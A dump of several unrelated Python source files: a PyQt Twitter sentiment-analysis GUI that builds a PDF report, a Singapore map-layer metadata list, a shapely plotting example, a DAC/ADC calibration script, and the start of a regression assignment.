Initializes the user interface by calling the setupUi method from interface_ui.py\n    
\"\"\"\n\n def __init__(self, app):\n super().__init__()\n self.setupUi(self)\n self.app = app\n\n \"\"\"\n Connect the event methods to the buttons\n \"\"\"\n self.homeBtn.clicked.connect(self.clickedHomeBtn)\n self.dataBtn.clicked.connect(self.clickedDataBtn)\n self.reportBtn.clicked.connect(self.clickedReportBtn)\n self.menuBtn.clicked.connect(self.menuClicked)\n self.infoBtn.clicked.connect(self.clickedInfoBtn)\n self.helpBtn.clicked.connect(self.clickedHelpBtn)\n self.minimizeWinBtn.clicked.connect(self.minimize)\n self.restoreWinBtn.clicked.connect(self.maximize)\n self.pushButton.clicked.connect(self.closeCenterMenu)\n self.closeWinBtn.clicked.connect(self.closeApp)\n self.searchBtn.clicked.connect(self.clickedSearchBtn)\n\n \"\"\"\n Create Canvas for Graphs\n \"\"\"\n self.canvas = FigureCanvas(Figure())\n self.ax = self.canvas.figure.add_subplot(111)\n self.toolbar = NavigationToolbar(self.canvas, self)\n\n self.container1 = QWidget()\n self.lay = QVBoxLayout(self.container1)\n self.lay.addWidget(self.canvas)\n self.lay.addWidget(self.toolbar)\n\n # Add widget to scroll layout\n self.scroll_layout.addWidget(self.container1)\n self.container1.setMinimumWidth(400)\n self.container1.setMinimumHeight(400)\n\n \"\"\"\n self.canvas2 = FigureCanvas(Figure())\n self.ax2 = self.canvas2.figure.add_subplot(111)\n self.toolbar2 = NavigationToolbar(self.canvas2, self)\n \"\"\"\n\n self.container2 = QWidget()\n self.lay = QVBoxLayout(self.container2)\n self.l1 = QLabel(self.container2)\n self.l1.setMinimumWidth(1000)\n self.l1.setMinimumHeight(800)\n\n # Add second widget to scroll layout\n self.scroll_layout.addWidget(self.container2)\n self.container2.setMinimumWidth(1000)\n self.container2.setMinimumHeight(800)\n\n \"\"\"\n self.lay.addWidget(self.canvas2)\n self.lay.addWidget(self.toolbar2)\n \"\"\"\n self.container3 = QWidget()\n self.lay = QVBoxLayout(self.container3)\n self.label = QLabel(self.container3)\n self.label.setMinimumWidth(800)\n self.label.setMinimumHeight(400)\n\n # Add third widget to scroll layout\n self.scroll_layout.addWidget(self.container3)\n self.container3.setMinimumWidth(800)\n self.container3.setMinimumHeight(400)\n\n self.container4 = QWidget()\n self.lay = QVBoxLayout(self.container4)\n self.l2 = QLabel(self.container4)\n self.l2.setMinimumWidth(1000)\n self.l2.setMinimumHeight(800)\n\n self.scroll_layout.addWidget(self.container4)\n self.container4.setMinimumWidth(1000)\n self.container4.setMinimumHeight(800)\n\n self.container5 = QWidget()\n self.lay = QVBoxLayout(self.container5)\n self.l3 = QLabel(self.container5)\n self.l3.setMinimumWidth(1000)\n self.l3.setMinimumHeight(600)\n\n # Add widget to scroll layout\n self.scroll_layout.addWidget(self.container5)\n self.container5.setMinimumWidth(1000)\n self.container5.setMinimumHeight(800)\n\n \"\"\"\n self.canvas3 = FigureCanvas(Figure())\n self.ax3 = self.canvas3.figure.add_subplot(111)\n self.toolbar3 = NavigationToolbar(self.canvas3, self)\n self.container4 = QWidget()\n self.lay4 = QVBoxLayout(self.container4)\n self.lay4.addWidget(self.canvas3)\n self.lay4.addWidget(self.toolbar3)\n \"\"\"\n \"\"\"\n self.scroll_layout.addWidget(self.container4)\n self.container4.setMinimumWidth(400)\n self.container4.setMinimumHeight(400)\n \"\"\"\n \"\"\" self.container.setMinimumWidth(800)\n self.container3.setMinimumHeight(400) \"\"\"\n\n \"\"\"\n Creates WebView for PDF\n \"\"\"\n self.webView = QWebEngineView()\n self.webView.settings().setAttribute(\n QWebEngineSettings.WebAttribute.PluginsEnabled, True)\n 
self.webView.settings().setAttribute(\n QWebEngineSettings.WebAttribute.PdfViewerEnabled, True)\n self.verticalLayout_13.addWidget(self.webView)\n self.webView.setMinimumHeight(600)\n\n # Button action logic\n\n # Changes the StackWidget to page 4 for home page\n\n def clickedHomeBtn(self):\n self.stackedWidget_2.setCurrentWidget(self.page_4)\n self.leftMenuContainer.setMaximumWidth(50)\n\n # Changes Stacked Widget to page 3 where user can enter search topic\n\n def clickedDataBtn(self):\n self.stackedWidget_2.setCurrentWidget(self.page_3)\n self.leftMenuContainer.setMaximumWidth(50)\n\n # Changes Stacked Widget to page 5 which is where WebView is already there for pdf view\n def clickedReportBtn(self):\n self.stackedWidget_2.setCurrentWidget(self.page_5)\n self.leftMenuContainer.setMaximumWidth(50)\n topic = self.lineEdit.text()\n\n # --------------------- Creates pdf file ---------------------------\n file = open(\"text.txt\", \"r\")\n text = file.read()\n file.close()\n\n pdf = FPDF('P', 'mm', 'Letter')\n\n # Add a page\n pdf.add_page()\n\n pdf.set_margins(10, 10, 10)\n\n # specify font\n # fonts ('times', 'courier', 'helvetica', 'symbol', 'zpfdingbats')\n # 'B' (bold), 'U' (underline), 'I' (italics), '' (regular), combination (i.e., ('BU'))\n\n pdf.set_font('helvetica', 'BU', size=16)\n\n pdf.cell(w=0, h=0, txt='Sentimental Anaylsis Report', align='C')\n\n pdf.ln(h=10)\n # Line Breaks are required inbetween new cells, multicells and images!\n\n pdf.set_font('helvetica', size=12)\n\n pdf.multi_cell(0, 10, text, align='J')\n\n # Add an new page\n pdf.add_page()\n\n pdf.set_font('helvetica', 'B', size=10)\n\n pdf.cell(w=0, h=0, txt='Figure 1:', align='L')\n\n # Add an image to the PDF\n # pdf.image(name, x = None, y = None, w = 0, h = 0, type = '', link = '')\n # For standard 8.5 x 11 paper 10x10 x/y will center it on page\n # w=195, h=149\n\n pdf.image('first.png', x=20, y=25, w=175, h=129)\n\n pdf.ln(h=160)\n\n pdf.set_font('helvetica', 'I', size=10)\n\n pdf.multi_cell(0, 10, 'Description: Figure 1 represents a bar graph containing the overall score for ' + str(topic) +\n '. The red bar is the total score weighted while the blue and orange represent the polarity and subjectivity score. 
The higher the total score is the more positive the sentiment for the selected topic', align='J')\n # Add an new page\n pdf.add_page()\n\n pdf.set_font('helvetica', 'B', size=10)\n\n pdf.cell(w=0, h=0, txt='Figure 2:', align='L')\n\n # Add an image to the PDF\n # pdf.image(name, x = None, y = None, w = 0, h = 0, type = '', link = '')\n # For standard 8.5 x 11 paper 10x10 x/y will center it on page\n # w=195, h=149\n\n pdf.image('bar.png', x=20, y=25, w=175, h=129)\n\n pdf.ln(h=160)\n\n pdf.set_font('helvetica', 'I', size=10)\n\n pdf.multi_cell(0, 10, 'Description: This is a graph that shows the top 10 most frequently reoccuring words found in the tweets.'\n + \"Tokenization was used to count the number of times each word appeared and the result for the top 10 were aggregated into this chart.\", align='J')\n # Add an new page\n pdf.add_page()\n\n pdf.set_font('helvetica', 'B', size=10)\n\n pdf.cell(w=0, h=0, txt='Figure 3:', align='L')\n\n # Add an image to the PDF\n # pdf.image(name, x = None, y = None, w = 0, h = 0, type = '', link = '')\n # For standard 8.5 x 11 paper 10x10 x/y will center it on page\n # w=195, h=149\n\n pdf.image('scatter.png', x=20, y=25, w=175, h=129)\n\n pdf.ln(h=160)\n\n pdf.set_font('helvetica', 'I', size=10)\n\n pdf.multi_cell(0, 10, 'Description: This graph is a scatter plot of all the tweets obtained via the Twitter API for a given topic. This graph you can see the relationship between polarity and subjectivity. If the point is darker that mean there are more than one tweet that generated the same score. .', align='J')\n\n # Add an new page\n pdf.add_page()\n\n pdf.set_font('helvetica', 'B', size=10)\n\n pdf.cell(w=0, h=0, txt='Figure 4:', align='L')\n\n # Add an image to the PDF\n # pdf.image(name, x = None, y = None, w = 0, h = 0, type = '', link = '')\n # For standard 8.5 x 11 paper 10x10 x/y will center it on page\n # w=195, h=149\n\n pdf.image('wordcloud.png', x=20, y=25, w=175, h=129)\n\n pdf.ln(h=160)\n\n pdf.set_font('helvetica', 'I', size=10)\n\n pdf.multi_cell(0, 10, 'Description: This graph shows wordcloud for the selected topic. The more a specific word appear in the data, the bigger and bolder it will appear in the word cloud and the more important it is. This word cloud was generated using a maximum of 5000 words. ', align='J')\n # Add an new page\n pdf.add_page()\n\n pdf.set_font('helvetica', 'B', size=10)\n\n pdf.cell(w=0, h=0, txt='Figure 5:', align='L')\n\n # Add an image to the PDF\n # pdf.image(name, x = None, y = None, w = 0, h = 0, type = '', link = '')\n # For standard 8.5 x 11 paper 10x10 x/y will center it on page\n # w=195, h=149\n\n pdf.image('adjectives.png', x=20, y=25, w=175, h=129)\n\n pdf.ln(h=160)\n\n pdf.set_font('helvetica', 'I', size=10)\n\n pdf.multi_cell(0, 10, 'Description: This graph shows the most frequent adjectives used in the tweets. Since these are descriptive words, they can really affect the overall score of the topic. Having more positive adjectives can really change the overall test results produced in the graphs. 
', align='J')\n\n pdf.output(\"pdftest.pdf\")\n\n # Sets webview to url leading to desktop directory where pdf was saved\n if len(sys.argv) > 1:\n self.webView.setUrl(QUrl(f\"{sys.argv[1]}\"))\n else:\n wd = wd = path.dirname(path.abspath(sys.argv[0]))\n test_pdf = \"pdftest.pdf\"\n self.webView.setUrl(QUrl(f\"file://{wd}/{test_pdf}\"))\n\n # Displays Menu\n def menuClicked(self):\n w = self.leftMenuContainer.width()\n maxExtend = 16777215\n standard = 50\n if w == 50:\n self.leftMenuContainer.setMaximumWidth(maxExtend)\n else:\n self.leftMenuContainer.setMaximumWidth(standard)\n\n # Displayes Info Tab\n def clickedInfoBtn(self):\n self.stackedWidget.setCurrentWidget(self.page)\n self.centerMenuSubContainer.setMinimumWidth(200)\n self.centerMenuContainer.setMinimumWidth(0)\n self.centerMenuContainer.setMaximumWidth(200)\n self.leftMenuContainer.setMaximumWidth(50)\n self.label_2.setText(\"To begin:\\nEnter a topic you would like\\nto explore in the search\\nbar. After clicking the \\nbutton the program will \\nget tweets from Twitter\\nThat contains the\\nSubject you have entered\\nBased on those results\\nThe program will generate\\nThe graphs that will tell\\nYou the sentiment of the\\nTopic you have entered. \\nThe higher the total score the\\nMore positive the tweets are\\nThe graphs will also present\\nFrequently used words that\\nGive users more information \\nAbout the topic.\")\n\n # Displayes Help Tab\n\n def clickedHelpBtn(self):\n self.stackedWidget.setCurrentWidget(self.page_2)\n self.centerMenuSubContainer.setMinimumWidth(200)\n self.centerMenuContainer.setMinimumWidth(0)\n self.centerMenuContainer.setMaximumWidth(200)\n self.leftMenuContainer.setMaximumWidth(50)\n self.label_3.setText(\"For more help:\\nFAQ:\\nWhere can I find documentation?\\nVisit QT Documentation\\nHow does the app work?\\nSee Information\\n\\n What is Polarity?\\nPolarity ranges from -1 to 1.\\nIt refers to negative and\\nPositive sentiment\\n\\nWhat is Subjectivity?\\nSubjectivity ranges from 0 to 1.\\nIt refers to personal opinions\\nand judgments.\\n\")\n\n def minimize(self):\n self.showMinimized()\n\n def maximize(self):\n self.showMaximized()\n\n def closeApp(self):\n sys.exit()\n\n def closeCenterMenu(self):\n self.centerMenuSubContainer.setMinimumWidth(0)\n self.centerMenuContainer.setMinimumWidth(0)\n self.centerMenuContainer.setMaximumWidth(0)\n\n # Logic to run API call to Twitter and get Tweet scores\n def clickedSearchBtn(self):\n tweets = self.getTweets()\n t = []\n tweetObj = []\n for tweet in tweets:\n t.append([tweet.full_text])\n\n for text in t:\n tweetObj.append(TweetObject(str(text)))\n\n topic = TopicObject(tweetObj)\n polarity = topic.getPolarity(tweetObj)\n subjectivity = topic.getSubjectivity(tweetObj)\n total = topic.getScore(polarity, subjectivity)\n self.label_9.setText(\"The Polarity score is: \" + str(polarity))\n self.label_10.setText(\n \"The Subjectivity score is: \" + str(subjectivity))\n\n data = {\n \"total\": total,\n \"polarity\": polarity,\n \"subjectivity\": subjectivity\n }\n\n self.getFirstGraph(data)\n\n tokenizer = TweetTokenizer()\n tweet_tokens = [tokenizer.tokenize(str(tweet)) for tweet in t]\n\n stop_words = ['RT', 'contact', '\\\"\\\"', 've',\n 's', 't', '*', '\\'', '...', '\\\"', ' ']\n # extract the adjectives\n adjectives = []\n adjectives.clear()\n for tokens in tweet_tokens:\n pos_tags = nltk.pos_tag(tokens)\n for word, pos in pos_tags:\n if pos == 'JJ' and word not in stop_words:\n adjectives.append(word)\n # print(adjectives)\n\n # create a list of 
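# The five near-identical figure pages assembled above follow one template; a
# hedged sketch of a helper that would fold them together (the helper name and
# the refactor are hypothetical; the layout constants and FPDF calls are the
# ones already used above):
def add_figure_page(pdf: FPDF, label: str, image_path: str, description: str):
    pdf.add_page()
    pdf.set_font('helvetica', 'B', size=10)
    pdf.cell(w=0, h=0, txt=label, align='L')
    pdf.image(image_path, x=20, y=25, w=175, h=129)
    pdf.ln(h=160)
    pdf.set_font('helvetica', 'I', size=10)
    pdf.multi_cell(0, 10, description, align='J')

# e.g. add_figure_page(pdf, 'Figure 2:', 'bar.png', 'Description: ...')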
unique adjectives and their frequency\n unique_adj = list(set(adjectives))\n adj_count = [adjectives.count(adj) for adj in unique_adj]\n\n current = []\n # sort the adjectives by frequency in descending order and select the top 10\n sorted_adj = [adj for adj, count in Counter(\n adjectives).most_common(15)]\n sorted_count = [count for adj, count in Counter(\n adjectives).most_common(15)]\n\n result = self.filter(t)\n self.wc(result, 'black', 'Frequent Words')\n\n self.getThirdGraph(result)\n\n x = topic.listPolarity(tweetObj)\n y = topic.listSubjectivity(tweetObj)\n self.getFourthGraph(x, y)\n self.getSecondGraph(sorted_adj, sorted_count)\n\n # Calls the Twitter API\n\n def getTweets(self):\n searchQuery = self.lineEdit.text()\n api = tweepy.API(auth)\n tweets = api.search_tweets(\n q=searchQuery, lang='en', result_type='recent', count=100, tweet_mode='extended')\n return (tweets)\n\n # Generates bar graph of total, subjectivity, and polarity\n # You pass in data dictionary as scores\n def getFirstGraph(self, scores):\n titles = list(scores.keys())\n values = list(scores.values())\n\n bar_labels = ['red', 'blue', 'orange']\n bar_colors = ['tab:red', 'tab:blue', 'tab:orange']\n\n self.ax.bar(titles, values, width=0.4,\n label=bar_labels, color=bar_colors)\n self.ax.set_ylabel(\"Scoress\")\n self.canvas.draw()\n self.canvas.print_figure(\"first.png\")\n\n # Generates word frequency graph\n\n def getSecondGraph(self, adj, count):\n fig, ax = plt.subplots(figsize=(7, 5.5))\n fig.set_size_inches(10, 5)\n plt.bar(adj, count, width=0.7, align='edge')\n plt.xlabel('Adjectives')\n plt.ylabel('Frequency')\n plt.title('Frequency of Adjectives in Tweets')\n plt.xticks(rotation=20)\n plt.savefig(\"adjectives.png\")\n self.l3.setPixmap(QPixmap(QImage(\"adjectives.png\")))\n self.l3.setScaledContents(True)\n\n # Generates the wordcloud\n\n def wc(self, data, bgcolor, title):\n wc = WordCloud(background_color=bgcolor,\n max_words=5000, max_font_size=50)\n gwc = wc.generate(' '.join(data))\n image = gwc.to_image()\n image.save(\"wordcloud.png\")\n self.label.setPixmap(QPixmap(QImage(\"wordcloud.png\")))\n self.label.setScaledContents(True)\n\n # Filters and cleans text\n\n def filter(self, t):\n # convert list into text\n list_to_text = ''.join(str(t))\n\n # removes punctuation,numbers and returns list of words\n desc_remove_pun = re.sub('[^A-Za-z]+', ' ', list_to_text)\n\n # remove all the stopwords from the text\n stop_words = list(get_stop_words('en'))\n nltk_words = list(stopwords.words('english'))\n stop_words.extend(nltk_words)\n\n word_tokens = nltk.tokenize.word_tokenize(desc_remove_pun)\n filtered_sentence_desc = [\n w_desc for w_desc in word_tokens if not w_desc in stop_words]\n filtered_sentence_desc = []\n for w_desc in word_tokens:\n if w_desc not in stop_words:\n filtered_sentence_desc.append(w_desc)\n\n # Remove characters which have length less than 2\n without_single_chr_desc = [\n word_desc for word_desc in filtered_sentence_desc if len(word_desc) > 2]\n\n # Remove numbers\n cleaned_data_desc = [\n word_desc for word_desc in without_single_chr_desc if not word_desc.isnumeric()]\n return (cleaned_data_desc)\n\n def getThirdGraph(self, data):\n top_N = 100\n word_dist_desc = nltk.FreqDist(data)\n rslt_desc = pd.DataFrame(word_dist_desc.most_common(top_N),\n columns=['Word', 'Frequency'])\n\n fig, ax = plt.subplots(figsize=(7, 5.5))\n fig.set_size_inches(10, 5)\n plt.figure(figsize=(10, 10))\n sns.set_style(\"whitegrid\")\n ax = sns.barplot(x=\"Word\", y=\"Frequency\", 
data=rslt_desc.head(10))\n plt.savefig(\"bar.png\")\n self.l1.setPixmap(QPixmap(QImage(\"bar.png\")))\n self.l1.setScaledContents(True)\n\n def getFourthGraph(self, list1, list2):\n N = len(list1)\n colors = np.random.rand(N)\n plt.figure(figsize=(10, 10))\n plt.scatter(list1, list2, c=colors, alpha=.2)\n plt.xlabel(\"Polarity\")\n plt.ylabel(\"Subjectivity\")\n plt.title(\"Polarity vs Subjectivity For Each Tweet\")\n plt.savefig(\"scatter.png\")\n self.l2.setPixmap(QPixmap(QImage(\"scatter.png\")))\n self.l2.setScaledContents(True)\n","repo_name":"JaquelinMG932/Senior-Project-2","sub_path":"mainwindow.py","file_name":"mainwindow.py","file_ext":"py","file_size_in_byte":19708,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72303740327","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\ndef getDatabase():\n \n \n region_db=[]\n masterPlan={'Name':'MASTER_PLAN',\n 'Description':'Master Plan 2019 Region Boundary (No Sea)',\n 'Remarks':'Converted from .kml to .shp',\n 'logoFile':'NA',\n 'shapeFile':'data/shapeFiles/masterPlan/master-plan-2019-region-boundary-no-sea-kml-polygon.shp',\n 'Source':'Urban Redevelopment Authority',\n 'LastUpdated':'13-08-2020',\n 'License':'https://data.gov.sg/open-data-licence'\n }\n \n region_db.append(masterPlan)\n \n db_dict=[]\n mcd={'Name':'MCD',\n 'Description':'List of MCD outlets in Singapore',\n 'Remarks':'NA',\n 'logoFile':'data/logoFiles/MCD.png',\n 'shapeFile':'data/shapeFiles/mcd/mcd_gdf.shp',\n 'Source':'https://www.mcdonalds.com.sg/locate-us/',\n 'LastUpdated':'20-11-2021',\n 'License':'NA'\n }\n \n db_dict.append(mcd)\n \n library={'Name':'LIBRARY',\n 'Description':'List of Library location in Singapore',\n 'Remarks':'Converted from .kml to .shp',\n 'logoFile':'data/logoFiles/LIBRARY.png',\n 'shapeFile':'data/shapeFiles/library/libraries-point.shp',\n 'Source':'National Library Board',\n 'LastUpdated':'25-08-2021',\n 'License':'https://data.gov.sg/open-data-licence'\n }\n \n db_dict.append(library)\n \n museums={'Name':'MUSEUMS',\n 'Description':'List of Museums location in Singapore',\n 'Remarks':'Converted from .kml to .shp',\n 'logoFile':'data/logoFiles/MUSEUMS.png',\n 'shapeFile':'data/shapeFiles/museums/museums-kml-point.shp',\n 'Source':'National Heritage Board',\n 'LastUpdated':'24-01-2019',\n 'License':'https://data.gov.sg/open-data-licence'\n }\n \n db_dict.append(museums)\n \n e_waste={'Name':'E_WASTE',\n 'Description':'List of E-waste recycling near you',\n 'Remarks':'Converted from .kml to .shp',\n 'logoFile':'data/logoFiles/EWASTE.png',\n 'shapeFile':'data/shapeFiles/e_waste/e-waste-recycling-kml-point.shp',\n 'Source':'National Environment Agency',\n 'LastUpdated':'02-10-2021',\n 'License':'https://data.gov.sg/open-data-licence'\n }\n \n db_dict.append(e_waste)\n \n wireless_hs={'Name':'WIRELESS_HS',\n 'Description':'List of Wireless@SG hotspots in Singapore',\n 'Remarks':'Converted from .geojson to .shp',\n 'logoFile':'data/logoFiles/HOTSPOT.png',\n 'shapeFile':'data/shapeFiles/wireless-hotspots/wireless-hotspots-geojson.shp',\n 'Source':'Infocomm Media Development Authority',\n 'LastUpdated':'22-03-2020',\n 'License':'https://data.gov.sg/open-data-licence'\n }\n \n db_dict.append(wireless_hs)\n \n \n waste_treatment={'Name':'WASTE_TREATMENT',\n 'Description':'Location of Toxic Industrial Wastes Treatment and Disposal Facilities',\n 'Remarks':'Converted from .geojson to .shp',\n 'logoFile':'data/logoFiles/WASTE.png',\n 
'shapeFile':'data/shapeFiles/waste-treatment/waste-treatment-geojson.shp',\n 'Source':'NATIONAL ENVIRONMENT AGENCY',\n 'LastUpdated':'22-03-2020',\n 'License':'https://data.gov.sg/open-data-licence'\n }\n \n db_dict.append(waste_treatment)\n \n monuments={'Name':'MONUMENTS',\n 'Description':'List of locations of monuments in Singapore',\n 'Remarks':'Converted from .geojson to .shp',\n 'logoFile':'data/logoFiles/MONUMENTS.png',\n 'shapeFile':'data/shapeFiles/monuments/monuments-geojson.shp',\n 'Source':'National Heritage Board',\n 'LastUpdated':'24-01-2019',\n 'License':'https://data.gov.sg/open-data-licence'\n }\n \n db_dict.append(monuments)\n \n historic_sites={'Name':'HISTORIC_SITES',\n 'Description':'List of locations of Historic Sites in Singapore',\n 'Remarks':'Converted from .geojson to .shp',\n 'logoFile':'data/logoFiles/HISTORIC.png',\n 'shapeFile':'data/shapeFiles/historic_sites/historic-sites-geojson.shp',\n 'Source':'National Heritage Board',\n 'LastUpdated':'24-01-2019',\n 'License':'https://data.gov.sg/open-data-licence'\n }\n \n db_dict.append(historic_sites)\n \n heritage_trees={'Name':'HERITAGE_TREES',\n 'Description':'List of locations of Heritage trees Sites in Singapore',\n 'Remarks':'Converted from .geojson to .shp',\n 'logoFile':'data/logoFiles/HERITAGE.png',\n 'shapeFile':'data/shapeFiles/heritage_trees/heritage-trees-geojson.shp',\n 'Source':'NATIONAL PARKS BOARD',\n 'LastUpdated':'10-06-2020',\n 'License':'https://data.gov.sg/open-data-licence'\n }\n \n db_dict.append(heritage_trees)\n \n hawker_centres={'Name':'HAWKER_CENTRE',\n 'Description':'List of locations of Hawker Center in Singapore',\n 'Remarks':'Converted from .geojson to .shp',\n 'logoFile':'data/logoFiles/HAWKER.png',\n 'shapeFile':'data/shapeFiles/hawker_centres/hawker-centres-geojson.shp',\n 'Source':'NATIONAL ENVIRONMENT AGENCY',\n 'LastUpdated':'03-09-2021',\n 'License':'https://data.gov.sg/open-data-licence'\n }\n \n db_dict.append(hawker_centres)\n \n dsa={'Name':'DSA',\n 'Description':'List of locations of Designated Smoking Areas (DSA)',\n 'Remarks':'Converted from .geojson to .shp',\n 'logoFile':'data/logoFiles/DSA.png',\n 'shapeFile':'data/shapeFiles/dsa/designated-smoking-areas-geojson.shp',\n 'Source':'National Environment Agency',\n 'LastUpdated':'09-09-2021',\n 'License':'https://data.gov.sg/open-data-licence'\n }\n \n db_dict.append(dsa)\n \n \n cft={'Name':'CFT',\n 'Description':'List of locations of Cash For Trash stations near you',\n 'Remarks':'Converted from .geojson to .shp',\n 'logoFile':'data/logoFiles/CFT.png',\n 'shapeFile':'data/shapeFiles/cft/cash-for-trash-geojson.shp',\n 'Source':'NATIONAL ENVIRONMENT AGENCY',\n 'LastUpdated':'06-03-2021',\n 'License':'https://data.gov.sg/open-data-licence'\n }\n \n db_dict.append(cft)\n \n \n return region_db,db_dict\n\n\n# if __name__ == '__main__':\n\n# # db_dict=getDatabase()\n \n \n\n","repo_name":"koulakhilesh/imvoronoit","sub_path":"data/db_description.py","file_name":"db_description.py","file_ext":"py","file_size_in_byte":6472,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4850345701","text":"from matplotlib import pyplot\nfrom shapely.geometry import Point, LineString\nfrom descartes import PolygonPatch\nfrom shapely.ops import cascaded_union\n\n#from figures import SIZE, BLUE, GRAY\n\nfig = pyplot.figure(1,figsize=(10,10), dpi=90)\npolygons = []\na = Point(1, 1).buffer(1.5)\nb = Point(2, 1).buffer(1.5)\n# line to polygon!\nline = LineString([(0,0), (0,1), (0,2), 
(1,2),(3,3)])\npolygons.append(line.buffer(0.1))\nps = cascaded_union(polygons)\nprint(ps)\n# 1\nax = fig.add_subplot(121)\n\npatch1 = PolygonPatch(ps, fc=(0.10,0.10,0.10), ec=(0.10,0.10,0.10), alpha=0.2, zorder=1)\nax.add_patch(patch1)\npatch2 = PolygonPatch(b, fc=(0.10,0.10,0.10), ec=(0.10,0.10,0.10), alpha=0.2, zorder=1)\nax.add_patch(patch2)\nc = a.intersection(b)\npatchc = PolygonPatch(c, fc=(0,0,0.5), ec=(0,0,0.5), alpha=0.5, zorder=2)\nax.add_patch(patchc)\n\nax.set_title('a.intersection(b)')\n\nxrange = [-1, 4]\nyrange = [-1, 3]\nax.set_xlim(*xrange)\n# thx to https://stackoverflow.com/a/13318111/8862202\nax.set_xticks(list(range(*xrange)) + [xrange[-1]])\nax.set_ylim(*yrange)\nax.set_yticks(list(range(*yrange)) + [yrange[-1]])\nax.set_aspect(1)\n\n#2\nax = fig.add_subplot(122)\n\npatch1 = PolygonPatch(a, fc=(0.10,0.10,0.10), ec=(0.10,0.10,0.10), alpha=0.2, zorder=1)\nax.add_patch(patch1)\npatch2 = PolygonPatch(b, fc=(0.10,0.10,0.10), ec=(0.10,0.10,0.10), alpha=0.2, zorder=1)\nax.add_patch(patch2)\nc = a.symmetric_difference(b)\n\nif c.geom_type == 'Polygon':\n patchc = PolygonPatch(c, fc=(0,0,0.5), ec=(0,0,0.5), alpha=0.5, zorder=2)\n ax.add_patch(patchc)\nelif c.geom_type == 'MultiPolygon':\n for p in c:\n patchp = PolygonPatch(p, fc=(0,0,0.5), ec=(0,0,0.5), alpha=0.5, zorder=2)\n ax.add_patch(patchp)\n\nax.set_title('a.symmetric_difference(b)')\n\nxrange = [-1, 4]\nyrange = [-1, 3]\nax.set_xlim(*xrange)\n# thx to https://stackoverflow.com/a/13318111/8862202\nax.set_xticks(list(range(*xrange)) + [xrange[-1]])\nax.set_ylim(*yrange)\nax.set_yticks(list(range(*yrange)) + [yrange[-1]])\nax.set_aspect(1)\n\npyplot.show()\n\n","repo_name":"alexw92/master-thesis-semantic-segmentation","sub_path":"Map_Stuff/Intersect_Example.py","file_name":"Intersect_Example.py","file_ext":"py","file_size_in_byte":1991,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10328248319","text":"# Python script for user to set voltage.\n# Author: Andrew Schick and Daniel Lis\n# License: MIT License\n\nimport time\n\n#Import the module\nimport Adafruit_MCP4725\n\n#import the ADC module class\nimport mcp3428\nimport smbus\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom numpy import linalg\n#create bus object \nbus = smbus.SMBus(1)\n#create a dictionary of addresses and information needed for the ADC instance\nkwargs = {'address': 0x68, 'mode': 0x10, 'sample_rate': 0x08, 'gain':0x00}\n\n#crate a ADC instance directing towards the bus with the addresses located in kwargs\nmcp3428 = mcp3428.MCP3428(bus, kwargs)\n\n# Create a DAC instance for the voltage input (DAC97) and the current max input\n# (DAC96)\ndac96 = Adafruit_MCP4725.MCP4725(address=0x60, busnum=1)\ndac97 = Adafruit_MCP4725.MCP4725(address=0x61, busnum=1)\n#Initialization of variables\n\n#How the readings change when they get read into and out of the ADC\nconversionVoltage= 300 * 1800/1709\nconversionCurrent= 3.3/10\n#DAC takes in a bit from 0 to 4095 since it is 12 bits\n#Initial Set to Bit is 0\nbitVoltage = 0\ndac97.set_voltage(bitVoltage) #set the voltage to zero through the dac instance\nbitCurrent = 0\ndac97.set_voltage(bitCurrent)\n#steps to follow\n#1. 
While loop that keeps on going through\r\n\r\nloopBool = int(input('1 or 0: do you want a loop?'))\r\n\r\nprint('\r\n')\r\nprint('-----------')\r\nprint('\r\n')\r\nprint ('Press ctrl-C to exit...')\r\n\r\n\r\nwhile loopBool == 0:\r\n    bitVoltage = int(input('Enter Voltage Bit: '))\r\n    bitCurrent = int(input('Enter Max Current bit: '))\r\n    \r\n    dac97.set_voltage(bitVoltage)\r\n    dac96.set_voltage(bitCurrent)\r\n    time.sleep(.1)\r\n    print ('Setting Voltage to : ' + str(bitVoltage))\r\n    print ('\r\n')\r\n    print ('------------')\r\n    print('\r\n')\r\n    print ('Voltage: ' + str(mcp3428.take_single_reading(0)*conversionVoltage))\r\n    print('\r\n')\r\n    print('------------')\r\n    print('\r\n')\r\n    print('Setting Max Current to : ' + str(bitCurrent))\r\n    print('\r\n')\r\n    print('------------')\r\n    print('\r\n')\r\n    print('Current: ' + str(mcp3428.take_single_reading(1)*conversionCurrent))\r\n\r\nwhile loopBool == 1:\r\n    voltages = np.zeros(4096)\r\n    currents = np.zeros(4096)\r\n    saveVoltage = 0\r\n    saveCurrent = 0\r\n    for i in range(4096):\r\n        \r\n        dac97.set_voltage(i)\r\n        dac96.set_voltage(i)\r\n        \r\n        voltage = mcp3428.take_single_reading(0)\r\n        current = mcp3428.take_single_reading(1)\r\n\r\n        print(str(i) + ' ---> Voltage: ' + str(voltage) + ' | Current: ' + str(current))\r\n        voltages[i] = float(voltage)\r\n        currents[i] = float(current)\r\n\r\n    \r\n    bitRange = np.arange(4096)\r\n\r\n    bitRange = bitRange[:,np.newaxis]\r\n    mVolt,_,_,_ = np.linalg.lstsq(bitRange, voltages)\r\n    mCurr,_,_,_ = np.linalg.lstsq(bitRange, currents)\r\n    \r\n    plt.figure(figsize=(6,2))\r\n\r\n    plt.subplot(121)\r\n    plt.plot(bitRange, voltages)\r\n    plt.xlabel('bit')\r\n    plt.ylabel('Reading')\r\n    plt.title('Voltage Conversion: '+ str(mVolt))\r\n\r\n    plt.subplot(122)\r\n    plt.plot(bitRange, currents)\r\n    plt.xlabel('bit')\r\n    plt.ylabel('Reading')\r\n    plt.title('Max Current Conversion: ' + str(mCurr))\r\n    plt.show()\r\n    break\r\n    \r\n    \r\n","repo_name":"UMassMENP/HVS_Project","sub_path":"DAC-ADC_Conversation.py","file_name":"DAC-ADC_Conversation.py","file_ext":"py","file_size_in_byte":3133,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36759085350","text":"#!/usr/bin/env python\n\nimport assignment1 as a1\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n(countries, features, values) = a1.load_unicef_data()\n\ntargets = values[:,1]\nx = values[:,7:]\nx = 